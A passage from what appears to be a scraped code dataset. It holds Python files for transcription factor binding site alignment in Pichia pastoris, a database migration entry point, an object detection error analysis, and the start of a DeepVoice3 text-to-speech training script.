\"Reverse_Complement\": Site_RC})\n \n def align(self, Compared_Object, start=0, end=0, OpG_Penalty=-10, ExG_Penalty=-1, EndG_Penalty = False): \n #Align a given subunit or putative site to a part of this object. \n end = len(self.Sequence) if end == 0 else end\n Interest_Sq = self.Sequence[start:end].upper() #Sequence that we are interested to check. Is equal to entire sequence if no start and end location is given.\n Compared_Sq = Compared_Object if type(Compared_Object) == str else Compared_Object.Sequence.upper() #Sequence that we comparing.\n if Interest_Sq == \"\":\n return[[\"-\",\"-\",0]]\n Needleman = pairwise2.align.globalms(Interest_Sq, Compared_Sq, 5, -4, OpG_Penalty, ExG_Penalty, penalize_end_gaps = EndG_Penalty)\n return Needleman\n\n def find_site(self, Reference_Sq, Known_Coordinates, Index=0, Slash_Count=0, Is_End=0, Aligned=0): \n Updated_Start = 0\n Updated_End = 0\n \n if Aligned == 0:\n #Count number of slashes before the putative site. Do not count slashes as characters so that the final value of the while loop is \n # equal to initial location of the site.\n Known_Location = Known_Coordinates[1] if Is_End == 1 else Known_Coordinates[0] + 1\n while Index < Known_Location:\n if Reference_Sq[Index + Slash_Count] == \"-\":\n Slash_Count = Slash_Count + 1\n else:\n Index = Index + 1\n Updated_Start = Known_Location + Slash_Count if Is_End == 1 else Known_Location + Slash_Count - 1\n #After finding the initial location, call the function recursively but this time to find the new end location. \n if Is_End == 0:\n Updated_End = self.find_site(Reference_Sq, Known_Coordinates, Index, Slash_Count, Is_End=1)\n if Is_End == 1:\n return Updated_Start \n else:\n #If transferring from aligned to actual, remove slashes from before and within the sequence. \n Slash_Before_Start = Reference_Sq[0:Known_Coordinates[0]+1].count(\"-\")\n Slash_Before_End = Reference_Sq[0:Known_Coordinates[1]].count(\"-\")\n Shift = Slash_Before_End - Slash_Before_Start #If any gaps where removed from within the corresponding region, pull 1 char from both sides to make up for it. 
\n if Shift == Known_Coordinates[1] - Known_Coordinates[0] - 1: #If there are no matching sites corresponding to the sequence just return an emptry string location.\n return [0, 0]\n Updated_Start = Known_Coordinates[0] - Slash_Before_Start - Shift\n Updated_End = Known_Coordinates[1] - Slash_Before_End + Shift \n return [Updated_Start, Updated_End]\n\n def refine(self, ComparisonList):\n RefinedSites = []\n for Comparison in ComparisonList:\n string = Comparison[1]\n slashes = re.finditer(\"-\", string)\n match_pos = [slash.start() for slash in slashes]\n match_pos.insert(0, -1)\n match_pos.append(len(string)+1)\n\n for ind in range(len(match_pos)):\n if match_pos[ind+1] - match_pos[ind] > 1:\n start_str, end_str = match_pos[ind], match_pos[ind+1]\n break;\n RefinedSites.append(Comparison[0][start_str+1:end_str]) \n return RefinedSites\n\n def compare(self, Compared_Object):\n Alignment = self.align(Compared_Object)\n Alignment = Alignment[0]\n for Item in Compared_Object.Putative_Site:\n Aligned_Site_Locations = self.find_site(Alignment[1] , [Item[\"Start_Location\"], Item[\"End_Location\"]])\n Translated_Site_Locations = self.find_site(Alignment[0], Aligned_Site_Locations, Aligned = 1)\n if Translated_Site_Locations == [0,0]:\n continue;\n Hit_Achieved_Zone = self.Sequence[Translated_Site_Locations[0]:Translated_Site_Locations[1]]\n if len(Hit_Achieved_Zone) == len(Item[\"Site_Sequence\"]):\n Comparison = self.align(Item[\"Site_Sequence\"], Translated_Site_Locations[0], Translated_Site_Locations[1], OpG_Penalty=-100, EndG_Penalty = True)\n else:\n Comparison = self.align(Item[\"Site_Sequence\"], Translated_Site_Locations[0], Translated_Site_Locations[1], OpG_Penalty=-100)\n if Comparison[0][2] >= len(Item[\"Site_Sequence\"])*2 and \"-\" not in Comparison[0][0]:\n if len(Item[\"Site_Sequence\"]) < len(Hit_Achieved_Zone):\n Hit_Achieved_Zone = self.refine(Comparison)\n self.Putative_Site.append({\"Site_ID\": Item[\"Site_ID\"], \"Start_Location\": Translated_Site_Locations[0],\n \"End_Location\": Translated_Site_Locations[1], \"Site_Sequence\": Hit_Achieved_Zone,\n \"Motif\": Item[\"Site_Sequence\"], \"Reverse_Complement\": Item[\"Reverse_Complement\"]}) \n\n def count_site(self, Database_Directory):\n Site_Counts = {}\n with open(Database_Directory) as Database:\n for Motif in motifs.parse(Database, \"jaspar\"):\n Count = 0\n for Sites in self.Putative_Site:\n if Motif.name == Sites[\"Site_ID\"]:\n Count = Count + 1\n if Count == 0:\n continue;\n Site_Counts[Motif.name] = Count\n return Site_Counts\n \n def write(self, Database_Directory):\n Site_Counts = self.count_site(Database_Directory)\n Total_Count = sum(Site_Counts.values())\n Record = {\"Cell ID\": self.Cell_Line, \"Pathway\": self.Pathway_ID, \"Enzyme\": self.Enzyme_ID, \n \"Reaction\": self.Reaction_ID, \"SubUnit\": self.SubUnit_ID, \"Promoter\": self.Sequence, \n \"Sites\": self.Putative_Site, \"Site Counts\": Site_Counts, \"Site Index\": Total_Count/len(self.Sequence), \"Hash\" : self.Hash}\n return Record\n\ndef read_csv(csv_directory, File_Type):\n with open(csv_directory) as csv_file:\n Mode = \"\"\n if File_Type == \"Reference\":\n Reference_Dictionary_List = []\n Temporary_Dictionary = {}\n Temporary_Site_List = []\n Reader = csv.reader(csv_file, delimiter = \";\")\n for Row in Reader:\n #Read the current program and adjust what program is doing with respect to what you read.\n if Row == []:\n continue;\n Mode = (\"Read Sequence\" if Row[0] == \"Cell ID\" else \n (\"Read Factor\" if Row[0] == \"HIT ID\" else Mode))\n if 
(Row[0] == \"Enzyme ID\") or (Row[0] == \"HIT ID\"):\n continue;\n elif Row[0] == \"NULL\":\n Temporary_Dictionary[\"Sites\"] = Temporary_Site_List\n Reference_Dictionary_List.append({Key : Temporary_Dictionary[Key] for Key in Temporary_Dictionary.keys()})\n Temporary_Dictionary = {}\n Temporary_Site_List = []\n continue;\n #If the mode of the program is set, and its not a mode changing location, read the data.\n if Mode == \"Read Sequence\":\n Temporary_Dictionary = {\"Cell ID\": Row[0], \"Pathway\": Row[1], \"Reaction\": Row[2],\n \"Enzyme\": Row[3], \"SubUnit\": Row[4], \"Promoter\": Row[5], \"Hash\": Row[7]}\n elif Mode == \"Read Factor\":\n factorPosition = int(Row[1]) if int(Row[1]) >= 0 else len(Temporary_Dictionary[\"Promoter\"]) + int(Row[1])\n reverseComplement = 1 if int(Row[1]) <= 0 else 0\n Temporary_Site_List.append([Row[0], factorPosition, Row[5], reverseComplement])\n return Reference_Dictionary_List\n elif File_Type == \"Comparison\":\n Reader = csv.DictReader(csv_file, delimiter = \";\")\n Compared_Dictionary_List = []\n Temporary_Dictionary = {\"Cell ID\": \"\"} \n Hash_Tracker = [] \n for Row in Reader:\n if Row[\"Hash\"] in Hash_Tracker:\n continue;\n Hash_Tracker.append(Row[\"Hash\"])\n if Row[\"Compared Gene Name\"] == \"\":\n continue;\n Temporary_Dictionary[\"Cell ID\"] = Row[\"Compared Cell Line\"] if Temporary_Dictionary[\"Cell ID\"] == \"\" else Temporary_Dictionary[\"Cell ID\"] \n Temporary_Dictionary[\"SubUnit\"] = Row[\"Compared Gene Name\"]\n Temporary_Dictionary[\"Promoter\"] = Row[\"Compared Sequence\"]\n Temporary_Dictionary[\"Hash\"] = Row[\"Hash\"]\n if Row[\"Pathway\"] != \"\":\n Temporary_Dictionary[\"Pathway\"] = Row[\"Pathway\"]\n if Row[\"Reaction\"] != \"\":\n Temporary_Dictionary[\"Reaction\"] = Row[\"Reaction\"]\n if Row[\"Compared Enzyme\"] != \"\":\n Temporary_Dictionary[\"Enzyme\"] = Row[\"Compared Enzyme\"]\n \n Compared_Dictionary_List.append({Key : Temporary_Dictionary[Key] for Key in Temporary_Dictionary.keys()})\n return Compared_Dictionary_List \n elif File_Type == \"Pathway\":\n Pathway_Dict = {}\n Reader = csv.DictReader(csv_file, delimiter = \";\")\n for Row in Reader:\n if Row[\"Pathway\"] != \"\":\n Pathway_Dict[Row[\"Pathway\"]] = {}\n else:\n Row[\"Pathway\"] = list(Pathway_Dict.keys())[-1] \n if Row[\"Compared Enzyme\"] != \"\": \n Pathway_Dict[Row[\"Pathway\"]][Row[\"Compared Enzyme\"]] = {}\n else:\n Row[\"Compared Enzyme\"] = list(Pathway_Dict[Row[\"Pathway\"]].keys())[-1]\n Pathway_Dict[Row[\"Pathway\"]][Row[\"Compared Enzyme\"]][Row[\"Compared Gene Name\"]] = {}\n return Pathway_Dict \n\ndef measure_key_frequency(dict_of_dicts):\n frequency = {}\n for d in dict_of_dicts.values():\n for key in d.keys():\n frequency[key] = 1 if key not in frequency else frequency[key] + 1\n return frequency\n\ndef reverseComplement(sequence):\n complement = {\"A\": \"T\", \"T\": \"A\", \"C\": \"G\", \"G\":\"C\"}\n reverseSq = sequence[::-1]\n reverseComplementSq = \"\"\n for char in reverseSq:\n char = char.upper()\n reverseComplementSq += complement[char]\n return reverseComplementSq\n\nif __name__ == \"__main__\": \n Comparison_Directory = input(\"Please enter Comparison List directory\")\n Reference_Directory = input(\"Please enter Scanner Results' directory\")\n Database_Directory = input(\"Please enter Putative Site database directory\")\n start = time.time()\n\n Reference_Sequence_Dictionary = read_csv(Reference_Directory, \"Reference\")\n Compared_Sequence_Dictionary = read_csv(Comparison_Directory, \"Comparison\")\n Pathway_Dictionary 
= read_csv(Comparison_Directory, \"Pathway\")\n \n Result_Dictionary = {}\n SubResults = open(\"SubunitWideAnalysis.csv\", \"w\")\n SubResult_Writer = csv.writer(SubResults, delimiter = \";\")\n Enzyme_Results = open(\"EnzymeWideAnalysis.csv\", \"w\")\n EnzymeResult_Writer = csv.writer(Enzyme_Results, delimiter = \";\")\n Pathway_Results = open(\"PathwayWideAnalysis.csv\", \"w\")\n PathwayResult_Writer = csv.writer(Pathway_Results, delimiter = \";\")\n \n for SUBUNIT in Compared_Sequence_Dictionary:\n Compared_Sequence = SubUnit_Object(SUBUNIT[\"Cell ID\"], SUBUNIT[\"Pathway\"], SUBUNIT[\"Reaction\"],\n SUBUNIT[\"Enzyme\"], SUBUNIT[\"SubUnit\"], SUBUNIT[\"Promoter\"], SUBUNIT[\"Hash\"])\n for REFERENCE in Reference_Sequence_Dictionary:\n if SUBUNIT[\"Hash\"] == REFERENCE[\"Hash\"]:\n Reference_Sequence = SubUnit_Object(REFERENCE[\"Cell ID\"], REFERENCE[\"Pathway\"], REFERENCE[\"Reaction\"],\n REFERENCE[\"Enzyme\"], REFERENCE[\"SubUnit\"], REFERENCE[\"Promoter\"], REFERENCE[\"Hash\"])\n for Site in REFERENCE[\"Sites\"]: \n Reference_Sequence.read_site(Site[0],Site[1],Site[2], Site[3])\n Compared_Sequence.compare(Reference_Sequence)\n Resulting_Object = Compared_Sequence.write(Database_Directory)\n if SUBUNIT[\"SubUnit\"] in Result_Dictionary.keys():\n if type(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"]) != list:\n print(\"{}:\\t{}\".format(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"], Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"]))\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"] = [Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"]]\n print(\"{}:\\t{}\".format(Resulting_Object[\"Hash\"], Resulting_Object[\"Site Counts\"]))\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Sites\"] = Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Sites\"] + Resulting_Object[\"Sites\"]\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"].append(Resulting_Object[\"Hash\"])\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"] = {k: Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"].get(k, 0) + Resulting_Object[\"Site Counts\"].get(k, 0) for k in set(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"]) | set(Resulting_Object[\"Site Counts\"])}\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Index\"] = sum(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"].values())/len(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Promoter\"])\n else:\n Result_Dictionary[SUBUNIT[\"SubUnit\"]] = Resulting_Object\n\n for Pathway_Key in Pathway_Dictionary.keys():\n for Enzyme_Key in Pathway_Dictionary[Pathway_Key].keys():\n for SubUnit_Key in Pathway_Dictionary[Pathway_Key][Enzyme_Key].keys():\n Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key] = Result_Dictionary[SubUnit_Key]\n \n for Pathway_Key in Pathway_Dictionary.keys():\n Pathway_Sites_Dict = {}\n Pathway_Common_Keys = []\n for Enzyme_Key in Pathway_Dictionary[Pathway_Key].keys():\n Enzyme_Sites_Dict = {}\n Enzyme_Common_Keys = []\n for SubUnit_Key in Pathway_Dictionary[Pathway_Key][Enzyme_Key].keys():\n Pathway_Sites_Dict[SubUnit_Key] = (Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key][\"Site Counts\"])\n Enzyme_Sites_Dict[SubUnit_Key] = (Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key][\"Site Counts\"])\n Enzyme_Key_Frequency = measure_key_frequency(Enzyme_Sites_Dict)\n for Key in Enzyme_Key_Frequency:\n if Enzyme_Key_Frequency[Key] >= len(Enzyme_Sites_Dict)*0.15:\n Enzyme_Common_Keys.append([Key , Enzyme_Key_Frequency[Key]/len(Enzyme_Sites_Dict)])\n EnzymeResult_Writer.writerow([Pathway_Key, Enzyme_Key, 
Enzyme_Common_Keys])\n\n Pathway_Key_Frequency = measure_key_frequency(Pathway_Sites_Dict)\n for Key in Pathway_Key_Frequency:\n if Pathway_Key_Frequency[Key] >= len(Pathway_Sites_Dict)*0.15:\n Pathway_Common_Keys.append([Key, Pathway_Key_Frequency[Key]/len(Pathway_Sites_Dict)])\n PathwayResult_Writer.writerow([Pathway_Key, Pathway_Common_Keys])\n\n tf_Dict = {}\n for Key in Result_Dictionary.values():\n SubResult_Writer.writerow(list(Key.values()))\n for Site in Key[\"Sites\"]:\n if Site[\"Site_ID\"] in tf_Dict.keys():\n if type(Site[\"Site_Sequence\"]) == str:\n correctedSq = reverseComplement(Site[\"Site_Sequence\"]) if Site[\"Reverse_Complement\"] == 1 else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]].append(correctedSq)\n else:\n correctedSq = [reverseComplement(Sq) for Sq in Site[\"Site_Sequence\"]] if Site[\"Reverse_Complement\"] == 1 else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]] = tf_Dict[Site[\"Site_ID\"]] + correctedSq\n else:\n Site_Sequence_List = [Site[\"Site_Sequence\"]] if type(Site[\"Site_Sequence\"]) == str else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]] = [reverseComplement(Sq) for Sq in Site_Sequence_List] if Site[\"Reverse_Complement\"] == 1 else Site_Sequence_List\n \n tf_Matrix_Dict = {}\n for Key in tf_Dict.keys():\n seqList = tf_Dict[Key]\n fm = []\n for i in range(len(seqList[0])):\n fm.append({'A':0, 'C':0, 'T':0, 'G':0})\n for site in seqList:\n site = site.upper()\n fm[i][site[i]] = fm[i][site[i]] + 1\n tf_Matrix_Dict[Key] = fm\n\n with open(\"site.txt\",\"w\") as siteRes:\n for Key in tf_Matrix_Dict.keys():\n siteRes.write(\"> \" + Key + \"\\n\")\n for base in [\"A\",\"C\",\"G\",\"T\"]:\n siteRes.write(base + \" [\")\n for loc in tf_Matrix_Dict[Key]:\n digit = loc[base]\n siteRes.write(\"{:>6}\".format(digit))\n siteRes.write(\" ]\\n\")\n siteRes.write(\"\\n\")\n\n with open(\"targetTFs.txt\",\"w\") as targetTFs:\n for Key in [\"ADR1\", \"CAT8\", \"SIP4\", \"HAP234\", \"RDS2\", \"YBR239C\", \n \"STB5\", \"MSN2\", \"MSN4\", \"MIG1\", \"TYE7\", \"GCR1\"]:\n if Key in tf_Dict.keys(): \n targetTFs.write(\"{} \\n\".format(Key))\n for SiteSequence in tf_Dict[Key]:\n targetTFs.write(\"{} \\n\".format(SiteSequence))\n else:\n continue\n\n end = time.time()\n print(\"Run Time: %.3f\" %(end-start))\n", "repo_name": "Biocatalysis-CHE-METU/TFBS-Analysis-of-Pichia-pastoris", "sub_path": "Searching Algorithm/Aligner.py", "file_name": "Aligner.py", "file_ext": "py", "file_size_in_byte": 18832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.pairwise2.align.globalms", "line_number": 32, "usage_type": "call"}, {"api_name": "Bio.pairwise2.align", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Bio.pairwise2", "line_number": 32, "usage_type": "name"}, {"api_name": "re.finditer", "line_number": 69, "usage_type": "call"}, {"api_name": "Bio.motifs.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "Bio.motifs", "line_number": 104, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 129, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 154, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 179, "usage_type": "call"}, {"api_name": "time.time", "line_number": 212, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 220, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 222, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 224, "usage_type": "call"}, 
{"api_name": "time.time", "line_number": 322, "usage_type": "call"}]}
+{"seq_id": "32006517156", "text": "import argparse\n\nfrom migration.config import (\n document_cfgs,\n source_db_cfg,\n destination_db_cfg,\n internal_db_cfg,\n)\nfrom migration.migration_utility.configuration.db_configuration import DbConfigurator\nfrom migration.migration_utility.configuration.document_configuration import (\n DocumentConfiguration,\n)\nfrom migration.migration_utility.controller.migration_controller import (\n MigrationController,\n)\nimport sys\n\n\ndef main(\n reset_migration: bool = False,\n force_migration: bool = False,\n flow: str = \"flat\"\n):\n \"\"\"main.\"\"\"\n\n document_config_models = [DocumentConfiguration(**cfg) for cfg in document_cfgs]\n source_db_cfg_model = DbConfigurator(**source_db_cfg)\n destination_db_cfg_model = DbConfigurator(**destination_db_cfg)\n internal_db_cfg_model = DbConfigurator(**internal_db_cfg)\n\n migration_ctrl = MigrationController(\n source_db_config=source_db_cfg_model,\n destination_db_config=destination_db_cfg_model,\n internal_db_config=internal_db_cfg_model,\n document_configs=document_config_models,\n flow=flow\n )\n\n migration_ctrl.migrate(reset_migration=reset_migration, force_migration=force_migration)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--reset\", action=\"store_true\", help=\"Resets all previously migrated documents to is_migrated=True state\")\n parser.add_argument(\"--force\", action=\"store_true\", help=\"Forces a repeated migration over all documents\")\n parser.add_argument(\"--id_list_path\", default=None, help=\"Path to a file with list of IDs to migrate\")\n parser.add_argument(\"--flow\", default=\"flat\", help=\"Specifies the migration flow\")\n\n args = parser.parse_args()\n\n main(\n reset_migration=args.reset,\n force_migration=args.force,\n flow=args.flow\n )\n", "repo_name": "tigrankh/migration", "sub_path": "migration/migrate.py", "file_name": "migrate.py", "file_ext": "py", "file_size_in_byte": 1860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "migration.migration_utility.configuration.document_configuration.DocumentConfiguration", "line_number": 26, "usage_type": "call"}, {"api_name": "migration.config.document_cfgs", "line_number": 26, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 27, "usage_type": "call"}, {"api_name": "migration.config.source_db_cfg", "line_number": 27, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 28, "usage_type": "call"}, {"api_name": "migration.config.destination_db_cfg", "line_number": 28, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 29, "usage_type": "call"}, {"api_name": "migration.config.internal_db_cfg", "line_number": 29, "usage_type": "name"}, {"api_name": "migration.migration_utility.controller.migration_controller.MigrationController", "line_number": 31, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "30298996547", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom PIL.ImageDraw import Draw\nfrom PIL import Image, ImageFont\nimport matplotlib.pyplot as plt\nimport os\nimport xml.etree.ElementTree as ET\nfrom os import listdir\nfrom os.path import isfile, join\nimport torch\nimport numpy as np\nimport pdb\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\n\ndef preprocess_annotation(target):\n boxes = []\n gt_classes = []\n difficult_boxes = []\n TO_REMOVE = 1\n\n for obj in target.iter(\"object\"):\n difficult = int(obj.find(\"difficult\").text) == 1\n if difficult:\n continue\n name = obj.find(\"name\").text.lower().strip()\n bb = obj.find(\"bndbox\")\n # Make pixel indexes 0-based\n # Refer to \"https://github.com/rbgirshick/py-faster-rcnn/blob/master/lib/datasets/pascal_voc.py#L208-L211\"\n box = [\n bb.find(\"xmin\").text,\n bb.find(\"ymin\").text,\n bb.find(\"xmax\").text,\n bb.find(\"ymax\").text,\n ]\n bndbox = tuple(\n map(lambda x: x - TO_REMOVE, list(map(int, box)))\n )\n\n boxes.append(bndbox)\n gt_classes.append(name)\n difficult_boxes.append(difficult)\n\n size = target.find(\"size\")\n im_info = tuple(map(int, (size.find(\"height\").text, size.find(\"width\").text)))\n\n res = {\n \"boxes\": torch.tensor(boxes, dtype=torch.float32),\n \"labels\": gt_classes,\n \"difficult\": torch.tensor(difficult_boxes),\n \"im_info\": im_info,\n }\n return res\n\ndef boxlist_iou(boxList1, boxList2):\n #INTERSEZIONE\n\n if boxList1.size != boxList2.size:\n raise RuntimeError(\"boxlists should have the same image size, got {}, {}\".format(boxList1, boxList2))\n\n boxList1 = boxList1.convert(\"xyxy\")\n boxList2 = boxList2.convert(\"xyxy\")\n\n area1 = boxList1.area()\n area2 = boxList2.area()\n\n box1, box2 = boxList1.bbox, boxList2.bbox\n\n lt = torch.max(box1[:, None, :2], box2[:, :2]) # [N,M,2]\n rb = torch.min(box1[:, None, 2:], box2[:, 2:]) # [N,M,2]\n\n TO_REMOVE = 1\n\n wh = (rb - lt + TO_REMOVE).clamp(min=0) # [N,M,2]\n inter = wh[:, :, 0] * wh[:, :, 1] # [N,M]\n ###############\n #AREA \n #area1 = (boxList1[:, 2] - boxList1[:, 0] + TO_REMOVE) * (boxList1[:, 3] - boxList1[:, 1] + TO_REMOVE)\n #area2 = (boxList2[:, 2] - boxList2[:, 0] + TO_REMOVE) * (boxList2[:, 3] - boxList2[:, 1] + TO_REMOVE)\n #IoU\n iou = inter / (area1[:, None] + area2 - inter)\n \n return iou\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target', type=str, help='Dataset root dir')\nparser.add_argument('--detections', type=str, help=\"Saved Detections .pth file\")\nparser.add_argument('--anno_path', type=str, help='Path to annotations .xml')\nparser.add_argument('--n_most_conf', type=int, default=2000, help='Number of most confidence predictions to condider for the Error Analysis')\nparser.add_argument('--subset_classes', nargs='+', help=\"List of classes to consider\")\nargs = parser.parse_args()\n\nvoc_classes = [\"__background__\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n\ncityscapes_classes = [\"__background__ \",\"person\",\"rider\",\"car\",\"truck\",\"bus\",\"train\",\"motorcycle\",\"bicycle\"]\n\n\nclasses = voc_classes\n\nif args.subset_classes is not None:\n sub_set_classes = args.subset_classes\nelse:\n sub_set_classes = classes\n\ndetections = torch.load(open(args.detections, 'rb'))\n\nlines = open(os.path.join(args.target, 
'ImageSets', 'Main', 'test.txt'), 'r').readlines()\nlines = [l.strip() for l in lines]\n\nassert len(lines) == len(detections)\n\nall_info = [] \n\nfor i in range(len(lines)): \n\n if (detections[i].bbox.shape[0] == 0):\n #questo caso significa che per quella immagine non ci sono predizioni della rete, cioè FN)\n continue\n\n\n annotations = ET.parse(args.anno_path + lines[i] +'.xml').getroot()\n immage_info = preprocess_annotation(annotations)\n\n if (immage_info[\"boxes\"].shape[0] == 0):\n #caso penso impossibile, cioè ground-truth image without bbox\n continue\n\n\n im_height, im_width = immage_info[\"im_info\"]\n detections[i] = detections[i].resize((im_width, im_height))\n\n detections[i].bbox[:, 2:] += 1\n immage_info[\"boxes\"][:, 2:] += 1\n\n iou_res = boxlist_iou(BoxList(detections[i].bbox.numpy(),(im_width, im_height)), BoxList(immage_info[\"boxes\"].numpy(), (im_width, im_height))).numpy()\n\n gt_index = iou_res.argmax(axis=1)\n iou_with_gt = iou_res.max(axis=1)\n\n del iou_res\n\n\n for k in range(len(detections[i].extra_fields['labels'])):\n\n temp_dict = {}\n temp_dict[f\"{i}_{k}\"] = k\n temp_dict[\"label_p\"] = classes[detections[i].extra_fields['labels'][k]]\n\n temp_dict[\"label_gt\"] = immage_info[\"labels\"][gt_index[k]]\n temp_dict[\"score\"] = detections[i].extra_fields['scores'].numpy()[k]\n temp_dict[\"iou_gt\"] = iou_with_gt[k]\n\n if temp_dict[\"label_gt\"] in sub_set_classes:\n all_info.append(temp_dict)\n\n\n\ndef take_score(elem):\n return elem[\"score\"]\n\nall_info_sort = sorted(all_info, key=take_score, reverse=True)\n\n#ERROR ANALYSIS\n\n#prendo i primi 1000 most confidence predictions\nn_most_conf = args.n_most_conf \nall_info_sort = all_info_sort[:n_most_conf]\n#print(all_info_sort)\n\ncorrect = 0\nmisloc = 0\nbackgr = 0\ncounter = 0\n\nfor el in all_info_sort:\n\n if el[\"label_p\"] == el[\"label_gt\"]:\n\n if el[\"iou_gt\"] < 0.3:\n backgr += 1\n elif el[\"iou_gt\"] >= 0.5:\n correct += 1\n else:\n misloc += 1\n else:\n backgr += 1\n\n counter += 1\n\nprint(f\"Correct detections: {(correct/counter)*100:.2f}%\")\nprint(f\"Mislocalization Error: {(misloc/counter)*100:.2f}%\")\nprint(f\"Background Error: {(backgr/counter)*100:.2f}%\")\nprint(counter)\n\n", "repo_name": "FrancescoCappio/DL_utils", "sub_path": "Object_detection_error_analysis/error_analysis_with_BoxList.py", "file_name": "error_analysis_with_BoxList.py", "file_ext": "py", "file_size_in_byte": 5879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 73, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 126, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 126, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.structures.bounding_box.BoxList", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "40344938698", "text": "\"\"\"Trainining script for seq2seq text-to-speech synthesis model.\n\nusage: train.py [options]\n\noptions:\n --data-root= Directory contains preprocessed features.\n --checkpoint-dir= Directory where to save model checkpoints [default: checkpoints].\n --hparams= Hyper parameters [default: ].\n --preset= Path of preset parameters (json).\n --checkpoint= Restore model from checkpoint path if given.\n --checkpoint-seq2seq= Restore seq2seq model from checkpoint path.\n --checkpoint-postnet= Restore postnet model from checkpoint path.\n --train-seq2seq-only Train only seq2seq model.\n --train-postnet-only Train only postnet model.\n --restore-parts= Restore part of the model.\n --log-event-path= Log event path.\n --reset-optimizer Reset optimizer.\n --load-embedding= Load embedding from checkpoint.\n --speaker-id= Use specific speaker of data in case for multi-speaker datasets.\n -h, --help Show this help message and exit\n\"\"\"\nfrom docopt import docopt\n\nimport sys\nimport gc\nimport platform\nfrom os.path import dirname, join\nfrom tqdm import tqdm, trange\nfrom datetime import datetime\n\n# The deepvoice3 model\nfrom deepvoice3_pytorch import frontend, builder\nimport audio\nimport lrschedule\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.backends.cudnn as cudnn\nfrom torch.utils import data as data_utils\nfrom torch.utils.data.sampler import Sampler\nimport numpy as np\nfrom numba import jit\n\nfrom nnmnkwii.datasets import FileSourceDataset, FileDataSource\nfrom os.path import join, expanduser\nimport random\n\nimport librosa.display\nfrom matplotlib import pyplot as plt\nimport sys\nimport os\nfrom tensorboardX import SummaryWriter\nfrom matplotlib import cm\nfrom warnings import warn\nfrom hparams import hparams, hparams_debug_string\n\nglobal_step = 0\nglobal_epoch = 0\nuse_cuda = torch.cuda.is_available()\nif use_cuda:\n cudnn.benchmark = False\n\n_frontend = None # to be set later\n\n\ndef _pad(seq, max_len, constant_values=0):\n return np.pad(seq, (0, max_len - len(seq)),\n mode='constant', constant_values=constant_values)\n\n\ndef _pad_2d(x, max_len, b_pad=0):\n x = np.pad(x, [(b_pad, max_len - len(x) - b_pad), (0, 0)],\n mode=\"constant\", constant_values=0)\n return x\n\n\ndef plot_alignment(alignment, path, info=None):\n fig, ax = plt.subplots()\n im = ax.imshow(\n alignment,\n aspect='auto',\n origin='lower',\n interpolation='none')\n fig.colorbar(im, ax=ax)\n xlabel = 'Decoder timestep'\n if info is not None:\n xlabel += '\\n\\n' + info\n plt.xlabel(xlabel)\n plt.ylabel('Encoder timestep')\n 